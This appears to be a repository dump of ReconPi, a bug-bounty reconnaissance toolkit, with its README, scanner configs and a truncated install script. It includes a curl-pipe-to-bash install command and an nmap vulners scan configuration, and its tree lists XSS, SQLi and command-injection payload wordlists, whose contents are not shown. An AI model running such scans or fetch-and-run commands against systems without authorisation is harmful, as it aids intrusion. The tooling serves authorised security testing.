├── .github └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── CODE_OF_CONDUCT.md ├── LICENSE ├── README.md ├── configs ├── config.ini ├── config.yaml ├── naabu.conf └── tokens.txt ├── install.sh ├── recon.sh ├── scripts ├── clean_ips.py ├── daily └── webhook_Discord.py └── wordlists ├── Generic_SQLI.txt ├── Generic_SQL_Blind.txt ├── Generic_SQL_ErrorBased.txt ├── common-files.txt ├── fuzz.txt ├── keywords.txt ├── linux-cmd-injection.txt ├── open-redirect.txt ├── params.txt ├── windows-cmd-injection.txt ├── words_permutation.txt ├── xss-payload-list.txt └── xxe-payload-list.txt /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at developers@x1m.nl. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Martijn Baalman 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Recon Pi 2 | 3 | ``` 4 | __________ __________.__ 5 | \______ \ ____ ____ ____ ____\______ \__| 6 | | _// __ \_/ ___\/ _ \ / \| ___/ | 7 | | | \ ___/\ \__( <_> ) | \ | | | 8 | |____|_ /\___ >\___ >____/|___| /____| |__| 9 | \/ \/ \/ \/ 10 | 11 | v2.2 - @x1m_martijn 12 | ``` 13 | 14 | ReconPi - A lightweight recon tool that performs extensive reconnaissance with the latest tools using a Raspberry Pi. 15 | 16 | Start using that Raspberry Pi -- I know you all have one laying around somewhere ;) 17 | 18 | > Since version 2.1 ReconPi is usable on your VPS, thanks to [Sachin Grover](https://github.com/mavericknerd) for putting in a lot of work. 19 | 20 | The latest [HypriotOS](https://blog.hypriot.com/downloads/) image works perfect for Raspberry Pi's! 21 | 22 | ### Easy installation 23 | 24 | Connect to your ReconPi or VPS with SSH: 25 | 26 | `ssh pirate@192.168.2.16 [Edit IP address if needed]` 27 | 28 | Curl the `install.sh` script and run it: 29 | `curl -L https://raw.githubusercontent.com/x1mdev/ReconPi/master/install.sh | bash` 30 | 31 | ### Manual installation 32 | 33 | Connect to your system with SSH: 34 | 35 | 36 | `$ ssh pirate@192.168.2.16 [Edit IP address if needed]` 37 | 38 | Now we can set up everything, it's quite simple: 39 | 40 | - `git clone https://github.com/x1mdev/ReconPi.git` 41 | - `cd ReconPi` 42 | - `./install.sh` 43 | 44 | Grab a cup of coffee since this will take a while. 45 | 46 | ## Usage 47 | 48 | After installing all of the dependencies for the ReconPi you can finally start doing some recon! 49 | 50 | ``` 51 | $ recon 52 | ``` 53 | 54 | `recon.sh` will first gather resolvers for the given target, followed by subdomain enumeration and checking those assets for potential subdomain takeover. When this is done the IP addresses of the target are enumerated. Open ports will be discovered accompanied by a service scan provided by Nmap. 55 | 56 | [Nuclei](https://github) and its templates have been implemented in the routine! 57 | 58 | Finally the live targets will be screenshotted and evaluated to discover endpoints. 59 | 60 | Results will be stored on the Recon Pi and can be viewed by running `python -m SimpleHTTPServer 1337" in your results directory. Your results will be accessible from any system with a browser that exists in the same network. 61 | 62 | Make sure to add your SLACK token to the tokens.txt file if you want to get slack notification after the completion of recon process. 63 | 64 | ## Sample Token.txt ($HOME/ReconPi/configs/tokens.txt) 65 | 66 | ``` 67 | github_subdomains_token="" 68 | SLACK_WEBHOOK_URL="https://hooks.slack.com/services/xxx/xxx/xxx" 69 | findomain_spyse_token="" 70 | findomain_virustotal_token="" 71 | findomain_securitytrails_token="" 72 | CHAOS_KEY="" 73 | hackerhandle="reconpi" 74 | ``` 75 | 76 | ## Config Files (Note: config file for amass, subfinder and naabu are stored inside ReconPi/configs/ folder, provide your api keys in these files) 77 | 78 | **Input your API keys in these files to get better results** 79 | 80 | Subfinder Config file path : $HOME/ReconPi/configs/config.yaml 81 | 82 | Amass Config file path : $HOME/ReconPi/configs/config.ini 83 | 84 | We have added a `$hackerhandle` which is used in the nuclei scans. An additional `x-bug-bounty: reconpi` header will be added, please update this with your own handle :) 85 | 86 | ## Scripts 87 | 88 | - Script folder contains a script named **daily** which can be used as a cronjob to run subdomain enumeration automatically. 89 | 90 | - Methodology is to take already enumerated subdomains as input and use amass on top of them, then track their last 2 result, and alert new subdomains on slack. 91 | 92 | ## Tools 93 | 94 | Tools that will be installed: 95 | - [Go](https://github.com/golang) 96 | - [Subfinder](https://github.com/projectdiscovery/subfinder/cmd/subfinder) 97 | - [Subjack](https://github.com/haccer/subjack) 98 | - [Aquatone](https://github.com/michenriksen/aquatone) 99 | - [httprobe](https://github.com/tomnomnom/httprobe) 100 | - [assetfinder](https://github.com/tomnomnom/assetfinder) 101 | - [meg](https://github.com/tomnomnom/meg) 102 | - [tojson](https://github.com/tomnomnom/hacks/tojson) 103 | - [unfurl](https://github.com/tomnomnom/unfurl) 104 | - [gf](https://github.com/tomnomnom/gf) 105 | - [anew](https://github.com/tomnomnom/anew) 106 | - [qsreplace](https://github.com/tomnomnom/qsreplace) 107 | - [ffuf](https://github.com/ffuf/ffuf) 108 | - [gobuster](https://github.com/OJ/gobuster) 109 | - [amass](https://github.com/OWASP/Amass) 110 | - [getJS](https://github.com/003random/getJS) 111 | - [gau](https://github.com/lc/gau) 112 | - [shuffledns](https://github.com/projectdiscovery/shuffledns/cmd/shuffledns) 113 | - [dnsprobe](https://github.com/projectdiscovery/dnsprobe) 114 | - [naabu](https://github.com/projectdiscovery/naabu/cmd/naabu) 115 | - [nuclei](https://github.com/projectdiscovery/nuclei/cmd/nuclei) 116 | - [nuclei-template](https://github.com/projectdiscovery/nuclei-templates) 117 | - [cf-check](https://github.com/dwisiswant0/cf-check) 118 | - [massdns](https://github.com/blechschmidt/massdns) 119 | - [jq](https://stedolan.github.io/jq/) 120 | - [masscan](https://github.com/robertdavidgraham/masscan) 121 | - [Corsy](https://github.com/s0md3v/Corsy) 122 | - [Arjun](https://github.com/s0md3v/Arjun) 123 | - [Diggy](https://github.com/s0md3v/Diggy) 124 | - [Dnsgen](https://github.com/ProjectAnte/dnsgen) 125 | - [Sublert](https://github.com/yassineaboukir/sublert) 126 | - [Findomain](https://github.com/Edu4rdSHL/findomain) 127 | - [github-subdomain](https://raw.githubusercontent.com/gwen001/github-search/master/github-subdomains.py) 128 | - [linkfinder](https://github.com/GerbenJavado/LinkFinder) 129 | - [bass](https://github.com/Abss0x7tbh/bass) 130 | - [interlace](https://github.com/codingo/Interlace) 131 | - [nmap](https://nmap.org) 132 | - [Seclist](https://github.com/danielmiessler/SecList) 133 | - [Dirsearch](https://github.com/maurosoria/dirsearch) 134 | - [Dalfox](https://github.com/hahwul/dalfox) 135 | - [Hakrawler](https://github.com/hakluke/hakrawler) 136 | - [Naabu](https://github.com/projectdiscovery/naabu) 137 | - [chaos](https://github.com/projectdiscovery/chaos-client) 138 | - [httpx](https://github.com/projectdiscovery/httpx) 139 | - [altdns](https://github.com/infosec-au/altdns) 140 | 141 | ## Methodology 142 | - gatherResolvers 143 | - gatherSubdomains 144 | - checkTakeovers 145 | - getCNAME 146 | - gatherIPs 147 | - gatherScreenshots 148 | - startMeg 149 | - fetchArchive 150 | - fetchEndpoints 151 | - runNuclei 152 | - portScan 153 | - notifySlack 154 | 155 | **Subdomain Enumeration:** 156 | - Sublert 157 | - Subfinder 158 | - assetfinder 159 | - amass 160 | - findomain (Add findomain sources token to get better result) 161 | - chaos dataset 162 | - github-subdomains 163 | - dns.bufferover.run 164 | - Mutate above Subdomains using commonspeak subdomain list 165 | 166 | - Combine and Sort above result -> Use shuffledns to resolve -> dnsgen(to mutate) -> httprobe (to get alive hosts) 167 | 168 | - Check takeover using subjack and nuclei 169 | 170 | - Get CNAME to check manually for takeovers 171 | 172 | - Use dnsprobe to gather IP, ignore if they fall in cloudflare ip range 173 | 174 | - Do masscan and then nmap scan on them, also use http-title and vulners script. 175 | 176 | - Take Screenshot for visual recon 177 | 178 | - Use gau to to get archive urls, get paramlist, jsurls, phpurls, aspxurls, and jspurls in there own files. 179 | 180 | - Get Endpoints using Linkfinder 181 | 182 | - Run Nuclei Scripts on alive hosts 183 | 184 | - Notify on Slack channel if token is specified. 185 | 186 | - Directory Buteforcing (Not enabled, as it takes long time, it is better to do manually) 187 | 188 | More tools will be added in the future, feel free to make a pull request! 189 | 190 | ## Contributors 191 | 192 | - [Sachin Grover](https://github.com/mavericknerd) (Twitter: @mavericknerd) 193 | - [Damian Ebelties](https://github.com/ebelties) 194 | -------------------------------------------------------------------------------- /configs/config.ini: -------------------------------------------------------------------------------- 1 | # Copyright 2017-2020 Jeff Foley. All rights reserved. 2 | # Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. 3 | 4 | # Should results only be collected passively and without DNS resolution? Not recommended. 5 | #mode = passive 6 | # Would you like to use active techniques that communicate directly with the discovered assets, 7 | # such as pulling TLS certificates from discovered IP addresses and attempting DNS zone transfers? 8 | #mode = active 9 | 10 | # The directory that stores the Cayley graph database and other output files 11 | # The default for Linux systems is: $HOME/.config/amass 12 | #output_directory = amass 13 | 14 | # Another location (directory) where the user can provide ADS scripts to the engine. 15 | #scripts_directory = 16 | 17 | # The maximum number of DNS queries that can be performed concurrently during the enumeration. 18 | #maximum_dns_queries = 20000 19 | 20 | # DNS resolvers used globally by the amass package. 21 | #[resolvers] 22 | #monitor_resolver_rate = true 23 | #resolver = 1.1.1.1 ; Cloudflare 24 | #resolver = 8.8.8.8 ; Google 25 | #resolver = 64.6.64.6 ; Verisign 26 | #resolver = 74.82.42.42 ; Hurricane Electric 27 | #resolver = 1.0.0.1 ; Cloudflare Secondary 28 | #resolver = 8.8.4.4 ; Google Secondary 29 | #resolver = 64.6.65.6 ; Verisign Secondary 30 | #resolver = 77.88.8.1 ; Yandex.DNS Secondary 31 | 32 | [scope] 33 | # The network infrastructure settings expand scope, not restrict the scope. 34 | # Single IP address or range (e.g. a.b.c.10-245) 35 | #address = 192.168.1.1 36 | #cidr = 192.168.1.0/24 37 | #asn = 26808 38 | #port = 80 39 | port = 443 40 | #port = 8080 41 | 42 | # Root domain names used in the enumeration. The findings are limited by the root domain names provided. 43 | #[scope.domains] 44 | #domain = owasp.org 45 | #domain = appsecusa.org 46 | #domain = appsec.eu 47 | #domain = appsec-labs.com 48 | 49 | # Are there any subdomains that are out of scope? 50 | #[scope.blacklisted] 51 | #subdomain = education.appsec-labs.com 52 | #subdomain = 2012.appsecusa.org 53 | 54 | # The graph database discovered DNS names, associated network infrastructure, results from data sources, etc. 55 | # This information is then used in future enumerations and analysis of the discoveries. 56 | #[graphdbs] 57 | #local_database = true ; Set this to false to disable use of the local database. 58 | 59 | # postgres://[username:password@]host[:port]/database-name?sslmode=disable of the PostgreSQL 60 | # database and credentials. Sslmode is optional, and can be disable, require, verify-ca, or verify-full. 61 | #[graphdbs.postgres] 62 | #primary = false ; Specify which graph database is the primary db, or the local database will be selected. 63 | #url = "postgres://[username:password@]host[:port]/database-name?sslmode=disable" 64 | #options="connect_timeout=10" 65 | 66 | # MqSQL database and credentials URL format: 67 | # [username:password@]tcp(host[:3306])/database-name?timeout=10s 68 | #[graphdbs.mysql] 69 | #url = [username:password@]tcp(host[:3306])/database-name?timeout=10s 70 | 71 | # Settings related to DNS name brute forcing. 72 | #[bruteforce] 73 | #enabled = true 74 | #recursive = true 75 | # Number of discoveries made in a subdomain before performing recursive brute forcing: Default is 1. 76 | #minimum_for_recursive = 1 77 | #wordlist_file = /usr/share/wordlists/all.txt 78 | #wordlist_file = /usr/share/wordlists/all.txt # multiple lists can be used 79 | 80 | # Would you like to permute resolved names? 81 | #[alterations] 82 | #enabled = true 83 | # edit_distance specifies the number of times a primitive edit operation will be 84 | # performed on a name sample during fuzzy label searching. 85 | #edit_distance = 1 ; Setting this to zero will disable this expensive feature. 86 | #flip_words = true # test-dev.owasp.org -> test-prod.owasp.org 87 | #flip_numbers = true # test1.owasp.org -> test2.owasp.org 88 | #add_words = true # test.owasp.org -> test-dev.owasp.org 89 | #add_numbers = true # test.owasp.org -> test1.owasp.org 90 | # Multiple lists can be used. 91 | #wordlist_file = /usr/share/wordlists/all.txt 92 | #wordlist_file = /usr/share/wordlists/all.txt 93 | 94 | [data_sources] 95 | # When set, this time-to-live is the minimum value applied to all data source caching. 96 | minimum_ttl = 1440 ; One day 97 | 98 | # Are there any data sources that should be disabled? 99 | #[data_sources.disabled] 100 | #data_source = Ask 101 | #data_source = Exalead 102 | #data_source = IPv4Info 103 | 104 | # Provide data source configuration information. 105 | # See the following format: 106 | #[data_sources.SOURCENAME] ; The SOURCENAME must match the name in the data source implementation. 107 | #ttl = 4320 ; Time-to-live value sets the number of minutes that the responses are cached. 108 | # Unique identifier for this set of SOURCENAME credentials. 109 | # Multiple sets of credentials can be provided and will be randomly selected. 110 | #[data_sources.SOURCENAME.CredentialSetID] 111 | #apikey = ; Each data source uses potentially different keys for authentication. 112 | #secret = ; See the examples below for each data source. 113 | #username = 114 | #password = 115 | 116 | #[data_sources.AlienVault] 117 | #[data_sources.AlienVault.Credentials] 118 | #apikey = 119 | 120 | #[data_sources.BinaryEdge] 121 | #ttl = 10080 122 | #[data_sources.BinaryEdge.Credentials] 123 | #apikey = 124 | 125 | #[data_sources.C99] 126 | #ttl = 4320 127 | #[data_sources.C99.account1] 128 | #apikey= 129 | #[data_sources.C99.account2] 130 | #apikey= 131 | 132 | #[data_sources.Censys] 133 | #ttl = 10080 134 | #[data_sources.Censys.Credentials] 135 | #apikey = 136 | #secret = 137 | 138 | #[data_sources.Chaos] 139 | #ttl = 4320 140 | #[data_sources.Chaos.Credentials] 141 | #apikey= 142 | 143 | #[data_sources.Cloudflare] 144 | #[data_sources.Cloudflare.Credentials] 145 | #apikey= 146 | 147 | #[data_sources.CIRCL] 148 | #[data_sources.CIRCL.Credentials] 149 | #username = 150 | #password = 151 | 152 | #[data_sources.DNSDB] 153 | #ttl = 4320 154 | #[data_sources.DNSDB.Credentials] 155 | #apikey = 156 | 157 | # Look here for how to obtain the Facebook credentials: 158 | # https://goldplugins.com/documentation/wp-social-pro-documentation/how-to-get-an-app-id-and-secret-key-from-facebook/ 159 | #[data_sources.FacebookCT] 160 | #ttl = 4320 161 | #[data_sources.FacebookCT.app1] 162 | #apikey= 163 | #secret= 164 | #[data_sources.FacebookCT.app2] 165 | #apikey= 166 | #secret= 167 | 168 | #[data_sources.GitHub] 169 | #ttl = 4320 170 | #[data_sources.GitHub.accountname] 171 | #apikey = 172 | 173 | #[data_sources.NetworksDB] 174 | #[data_sources.NetworksDB.Credentials] 175 | #apikey = 176 | 177 | #[data_sources.PassiveTotal] 178 | #ttl = 10080 179 | #[data_sources.PassiveTotal.Credentials] 180 | #username = 181 | #apikey = 182 | 183 | #[data_sources.ReconDev] 184 | #[data_sources.ReconDev.free] 185 | #apikey = 186 | #[data_sources.ReconDev.paid] 187 | #apikey = 188 | 189 | #[data_sources.SecurityTrails] 190 | #ttl = 1440 191 | #[data_sources.SecurityTrails.Credentials] 192 | #apikey = 193 | 194 | #[data_sources.Shodan] 195 | #ttl = 10080 196 | #[data_sources.Shodan.Credentials] 197 | #apikey = 198 | 199 | #[data_sources.Spyse] 200 | #ttl = 4320 201 | #[data_sources.Spyse.Credentials] 202 | #apikey = 203 | 204 | # Provide your Twitter App Consumer API key and Consumer API secrety key 205 | #[data_sources.Twitter] 206 | #[data_sources.Twitter.account1] 207 | #apikey = 208 | #secret = 209 | #[data_sources.Twitter.account2] 210 | #apikey = 211 | #secret = 212 | 213 | # The apikey must be an API access token created through the Investigate management UI 214 | #[data_sources.Umbrella] 215 | #[data_sources.Umbrella.Credentials] 216 | #apikey = 217 | 218 | # URLScan can be used without an API key, but the key allows new submissions to be made 219 | #[data_sources.URLScan] 220 | #[data_sources.URLScan.Credentials] 221 | #apikey = 222 | 223 | #[data_sources.VirusTotal] 224 | #ttl = 10080 225 | #[data_sources.VirusTotal.Credentials] 226 | #apikey = 227 | 228 | #[data_sources.WhoisXML] 229 | #[data_sources.WhoisXML.Credentials] 230 | #apikey= 231 | 232 | #[data_sources.ZETAlytics] 233 | #ttl = 1440 234 | #[data_sources.ZETAlytics.Credentials] 235 | #apikey= 236 | -------------------------------------------------------------------------------- /configs/config.yaml: -------------------------------------------------------------------------------- 1 | resolvers: 2 | - 1.1.1.1 3 | - 1.0.0.1 4 | - 8.8.8.8 5 | - 8.8.4.4 6 | - 9.9.9.9 7 | - 9.9.9.10 8 | - 77.88.8.8 9 | - 77.88.8.1 10 | - 208.67.222.222 11 | - 208.67.220.220 12 | sources: 13 | - alienvault 14 | - binaryedge 15 | - bufferover 16 | - certspotter 17 | - certspotterold 18 | - censys 19 | - chaos 20 | - crtsh 21 | - dnsdumpster 22 | - hackertarget 23 | - intelx 24 | - ipv4info 25 | - passivetotal 26 | - securitytrails 27 | - shodan 28 | - spyse 29 | - sublist3r 30 | - threatcrowd 31 | - threatminer 32 | - virustotal 33 | all-sources: 34 | - alienvault 35 | - archiveis 36 | - binaryedge 37 | - bufferover 38 | - censys 39 | - certspotter 40 | - certspotterold 41 | - chaos 42 | - commoncrawl 43 | - crtsh 44 | - dnsdumpster 45 | - dnsdb 46 | - entrust 47 | - github 48 | - hackertarget 49 | - ipv4info 50 | - intelx 51 | - passivetotal 52 | - rapiddns 53 | - recon 54 | - securitytrails 55 | - shodan 56 | - sitedossier 57 | - spyse 58 | - sublist3r 59 | - threatcrowd 60 | - threatminer 61 | - virustotal 62 | - waybackarchive 63 | - zoomeye 64 | recursive: 65 | - alienvault 66 | - bufferover 67 | - certspotter 68 | - certspotterold 69 | - crtsh 70 | - dnsdumpster 71 | - hackertarget 72 | - ipv4info 73 | - passivetotal 74 | - securitytrails 75 | - sublist3r 76 | - virustotal 77 | binaryedge: [] 78 | censys: [] 79 | certspotter: [] 80 | chaos: [] 81 | dnsdb: [] 82 | github: [] 83 | intelx: [] 84 | passivetotal: [] 85 | securitytrails: [] 86 | shodan: [] 87 | spyse: [] 88 | urlscan: [] 89 | virustotal: [] 90 | zoomeye: [] 91 | subfinder-version: 2.4.0 92 | -------------------------------------------------------------------------------- /configs/naabu.conf: -------------------------------------------------------------------------------- 1 | 2 | # Number of retries 3 | # retries: 1 4 | # Packets rate 5 | # rate: 100 6 | # Timeout is the seconds to wait for ports to respond 7 | # timeout: 5 8 | # Hosts are the host to find ports for 9 | # host: 10 | # - 10.10.10.10 11 | # Ports is the ports to use for enumeration 12 | # ports: 13 | # - 80 14 | # - 100 15 | # ExcludePorts is the list of ports to exclude from enumeration 16 | # exclude-ports: 17 | # - 20 18 | # - 30 19 | # Verify is used to check if the ports found were valid using CONNECT method 20 | # verify: false 21 | # NoProbe skips probes to discover alive hosts 22 | # no-probe: false 23 | # Ping uses ping probes to discover fastest active host and discover dead hosts 24 | # ping: true 25 | # Port Probes (SYN-PORT, ACK-PORT) 26 | # port-probes: 27 | # - A80 28 | # - S110 29 | # Ips or cidr to be excluded from the scan 30 | # exclude-ips: 31 | # - 1.1.1.1 32 | # - 2.2.2.2 33 | # Top ports list 34 | # top-ports: 100 35 | # Attempts to run as root 36 | # privileged: true 37 | # Drop root privileges 38 | # unprivileged: true 39 | # Excludes ip of knows CDN ranges 40 | # exclude-cdn: true 41 | # IcmpEchoProbe before scanning 42 | # icmp-echo-probe: true 43 | # IcmpTimestampProbe before scanning 44 | # icmp-timestamp-probe: false 45 | # SourceIp to use in TCP packets 46 | # source-ip: 10.10.10.10 47 | # Interface to use for TCP packets 48 | # interface: eth0 49 | # WarmUpTime between scan phases 50 | # warm-up-time: 2 51 | # nmap command to invoke after scanning 52 | nmap: nmap -sV --script /usr/share/nmap/scripts/vulners.nse,http-title --min-rate 40000 -T4 --max-retries 2 -oA reconpi-nmap 53 | -------------------------------------------------------------------------------- /configs/tokens.txt: -------------------------------------------------------------------------------- 1 | github_subdomains_token="" 2 | SLACK_WEBHOOK_URL="https://hooks.slack.com/services/xxx/xxx/xxx" 3 | DISCORD_WEBHOOK_URL="https://discordapp.com/api/webhooks/xxx/xxx" 4 | findomain_spyse_token="" 5 | findomain_virustotal_token="" 6 | findomain_securitytrails_token="" 7 | CHAOS_KEY="" 8 | hackerhandle="reconpi" 9 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | : ' 3 | @name ReconPi install.sh 4 | @author Martijn B 5 | @link https://github.com/x1mdev/ReconPi 6 | ' 7 | 8 | : 'Set the main variables' 9 | YELLOW="\033[133m" 10 | GREEN="\033[032m" 11 | RESET="\033[0m" 12 | VERSION="2.2" 13 | 14 | : 'Display the logo' 15 | displayLogo() { 16 | clear 17 | echo -e " 18 | __________ __________.__ 19 | \______ \ ____ ____ ____ ____\______ \__| 20 | | _// __ \_/ ___\/ _ \ / \| ___/ | 21 | | | \ ___/\ \__( <_> ) | \ | | | 22 | |____|_ /\___ >\___ >____/|___| /____| |__| 23 | \/ \/ \/ \/ 24 | 25 | v$VERSION - $YELLOW@x1m_martijn$RESET" 26 | } 27 | 28 | : 'Basic requirements' 29 | basicRequirements() { 30 | echo -e "[$GREEN+$RESET] This script will install the required dependencies to run recon.sh, please stand by.." 31 | echo -e "[$GREEN+$RESET] It will take a while, go grab a cup of coffee :)" 32 | cd "$HOME" || return 33 | sleep 1 34 | echo -e "[$GREEN+$RESET] Getting the basics.." 35 | export LANGUAGE=en_US.UTF-8 36 | export LANG=en_US.UTF-8 37 | export LC_ALL=en_US.UTF-8 38 | sudo apt-get update -y 39 | sudo apt-get install git -y 40 | git clone https://github.com/x1mdev/ReconPi.git 41 | sudo apt-get install -y --reinstall build-essential 42 | sudo apt install -y python3-pip 43 | sudo apt install -y file 44 | sudo apt-get install -y dnsutils 45 | sudo apt install -y lua5.1 alsa-utils libpq5 46 | sudo apt-get autoremove -y 47 | sudo apt clean 48 | #echo -e "[$GREEN+$RESET] Stopping Docker service.." 49 | #sudo systemctl disable docker.service 50 | #sudo systemctl disable docker.socket 51 | echo -e "[$GREEN+$RESET] Creating directories.." 52 | mkdir -p "$HOME"/tools 53 | mkdir -p "$HOME"/go 54 | mkdir -p "$HOME"/go/src 55 | mkdir -p "$HOME"/go/bin 56 | mkdir -p "$HOME"/go/pkg 57 | sudo chmod u+w . 58 | echo -e "[$GREEN+$RESET] Done." 59 | } 60 | 61 | : 'Golang initials' 62 | golangInstall() { 63 | echo -e "[$GREEN+$RESET] Installing and setting up Go.." 64 | 65 | if [[ $(go version | grep -o '1.14') == 1.14 ]]; then 66 | echo -e "[$GREEN+$RESET] Go is already installed, skipping installation" 67 | else 68 | cd "$HOME"/tools || return 69 | git clone https://github.com/udhos/update-golang 70 | cd "$HOME"/tools/update-golang || return 71 | sudo bash update-golang.sh 72 | sudo cp /usr/local/go/bin/go /usr/bin/ 73 | echo -e "[$GREEN+$RESET] Done." 74 | fi 75 | 76 | echo -e "[$GREEN+$RESET] Adding recon alias & Golang to "$HOME"/.bashrc.." 77 | sleep 1 78 | configfile="$HOME"/.bashrc 79 | 80 | if [ "$(cat "$configfile" | grep '^export GOPATH=')" == "" ]; then 81 | echo export GOPATH='$HOME'/go >>"$HOME"/.bashrc 82 | fi 83 | 84 | if [ "$(echo $PATH | grep $GOPATH)" == "" ]; then 85 | echo export PATH='$PATH:$GOPATH'/bin >>"$HOME"/.bashrc 86 | fi 87 | 88 | if [ "$(cat "$configfile" | grep '^alias recon=')" == "" ]; then 89 | echo "alias recon=$HOME/ReconPi/recon.sh" >>"$HOME"/.bashrc 90 | fi 91 | 92 | bash /etc/profile.d/golang_path.sh 93 | 94 | source "$HOME"/.bashrc 95 | 96 | cd "$HOME" || return 97 | echo -e "[$GREEN+$RESET] Golang has been configured." 98 | } 99 | 100 | : 'Golang tools' 101 | golangTools() { 102 | echo -e "[$GREEN+$RESET] Installing subfinder.." 103 | GO111MODULE=on go get -u -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder 104 | echo -e "[$GREEN+$RESET] Done." 105 | 106 | echo -e "[$GREEN+$RESET] Installing subjack.." 107 | go get -u -v github.com/haccer/subjack 108 | echo -e "[$GREEN+$RESET] Done." 109 | 110 | echo -e "[$GREEN+$RESET] Installing aquatone.." 111 | go get -u -v github.com/michenriksen/aquatone 112 | echo -e "[$GREEN+$RESET] Done." 113 | 114 | echo -e "[$GREEN+$RESET] Installing httprobe.." 115 | go get -u -v github.com/tomnomnom/httprobe 116 | echo -e "[$GREEN+$RESET] Done." 117 | 118 | echo -e "[$GREEN+$RESET] Installing assetfinder.." 119 | go get -u -v github.com/tomnomnom/assetfinder 120 | echo -e 